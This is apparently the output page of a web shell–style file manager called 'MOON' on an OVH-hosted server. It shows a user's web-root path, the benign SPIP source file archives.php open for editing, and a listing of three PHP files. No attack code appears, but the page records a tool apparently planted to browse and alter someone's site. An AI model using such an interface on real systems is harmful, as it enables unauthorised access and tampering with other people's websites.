┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
webm008.cluster103.gra.hosting.ovh.net
LOCATION:
/home/paxmediccp/www/plugins-dist/archiviste/inc
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: archives.php
<?php /*************************************************************************** * SPIP, Système de publication pour l'internet * * * * Copyright (c) avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * ***************************************************************************/ namespace Spip\Archives; include_spip('src/ArchiverInterface'); include_spip('src/AbstractArchiver'); include_spip('src/ArchiveInterface'); include_spip('src/NoDotFilterIterator'); include_spip('src/TarArchive'); include_spip('src/TgzArchive'); include_spip('src/ZipArchive'); include_spip('src/SpipArchiver'); use Spip\Archiver\SpipArchiver; /** * Point d'entrée de la gestion des archives compressées de SPIP */ class SpipArchives extends SpipArchiver { }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 archives.php
PHP
1.1 KB
2026-04-27 15:54
EDIT
📄 pcltar.php
PHP
115.5 KB
2025-11-12 11:28
EDIT
📄 pclzip.php
PHP
176.2 KB
2025-11-12 11:28
EDIT